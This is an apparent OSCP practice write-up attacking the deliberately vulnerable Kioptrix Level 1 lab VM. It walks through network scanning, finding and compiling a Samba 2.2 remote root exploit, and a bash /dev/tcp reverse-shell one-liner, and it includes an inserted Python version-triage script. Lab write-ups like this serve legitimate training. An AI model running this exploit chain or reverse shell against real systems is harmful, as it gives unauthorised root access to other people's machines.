OSCP practice: Vulnhub – Kioptrix Level 1

My OSCP exam is fast approaching. For extra practice I am going to start working through the relevant vulnhub machines.

A list of vulnhub machines that are more like OSCP here.

Starting right at the beginning with: Kioptrix Level 1

I used the free VMware Workstation edition and created a new private network. I moved my Kali machine and Kioptrix into that network. (I also have a basic DHCP/DNS server in there.)

Starting with a scan to find the machine:

netdiscover -r 10.0.0.0/24

Nmap scan of our discovered target:

nmap -p- -sV -sS -T4 -A 10.0.0.51

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)

We seem to have:

  • OpenSSH 2.9
  • HTTP & HTTPS
  • RPC & SMB (via Samba)

Starting a quick scan of the HTTP and SMB ports via dirb and enum4linux to build out the list of possible attack surfaces:

enum4linux 10.0.0.51

The most interesting thing in the scan is the version of Samba.

The latest on the Samba site is 4.7.0. The version on this server is 2.2.1a which looks really old. Looking at the Samba site, this version was from 2001 and was designed with Windows 2000 enhancements in mind.

dirb http://10.0.0.51

Quick manual check of the interesting pages:


At this point we have a handful of attack surfaces to explore:

  • Old Samba (2.2.1)
  • Old-ish Apache (Apache httpd 1.3.20)
  • Webalizer 2.01
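As an added example (not part of the original write-up), a small Python script that turns the nmap table and the Samba banner above into a flagged list of outdated components, which is the triage step this walkthrough does by hand. The minimum versions in MINIMUM_VERSIONS are illustrative assumptions, not vendor guidance, and the Samba banner line is a constructed sample in the format smbclient/enum4linux print.

```python
import re
# Constructed sample: the nmap service table from the scan above, pasted in so this runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
"""
# Constructed sample of the Samba banner as enum4linux/smbclient report it (nmap alone
# does not show the Samba version on this host).
SAMBA_BANNER = "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]"

# Illustrative minimum versions (an assumption for this example, not vendor guidance);
# a real baseline comes from your patch policy or vendor end-of-life tables.
MINIMUM_VERSIONS = {"OpenSSH": (7, 0), "Apache httpd": (2, 4), "OpenSSL": (1, 1), "Samba": (4, 0)}

def version_tuple(text):
    # '2.9p2', '1.3.20', '2.2.1a' -> comparable int tuples; trailing letters are dropped.
    return tuple(int(p) for p in re.match(r"\d+(?:\.\d+)*", text).group(0).split("."))

def parse_nmap_table(output):
    # Yield (port, product, version) for each row whose VERSION column names a product.
    for line in output.splitlines():
        row = re.match(r"(\d+)/(?:tcp|udp)\s+\S+\s+\S+\s+(.*)", line)
        if not row:
            continue
        port, banner = int(row.group(1)), row.group(2)
        # Leading 'Product name 1.2.3' ...
        main = re.match(r"([A-Za-z][\w-]*(?: [A-Za-z][\w-]*)*) (\d[\w.]*)", banner)
        if main:
            yield port, main.group(1), main.group(2)
        # ... plus bundled components written as name/version, e.g. 'OpenSSL/0.9.6b'.
        for name, ver in re.findall(r"(\w+)/(\d[\w.]*)", banner):
            yield port, name, ver

def outdated_services(output=NMAP_OUTPUT, samba_banner=SAMBA_BANNER):
    # Return sorted (port, product, version) triples that fall below the configured minimum.
    found = list(parse_nmap_table(output))
    samba = re.search(r"Server=\[Samba ([\w.]+)\]", samba_banner)
    if samba:
        found.append((139, "Samba", samba.group(1)))
    return sorted((port, prod, ver) for port, prod, ver in found
                  if prod in MINIMUM_VERSIONS and version_tuple(ver) < MINIMUM_VERSIONS[prod])

if __name__ == "__main__":
    for port, prod, ver in outdated_services():
        print(f"{port}/tcp {prod} {ver} is older than the baseline")
```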

The really old samba is particularly interesting, starting there:

searchsploit samba 2.2

A remote root exploit sounds perfect; inspecting the code to see if any manual work is needed. It seems ready to run as-is.

Compiled with: gcc 10.c -o sambaexploit

Execute with: ./sambaexploit -b 0 -v 10.0.0.51

It seems to have worked. We don't have an interactive shell (tried an ls command), but we appear to be able to execute commands.

Set up a local listener: nc -nlvp 443

Execute reverse shell via the exploit prompt: bash -i >& /dev/tcp/10.0.0.50/443 0>&1

Success – interactive reverse shell (as root):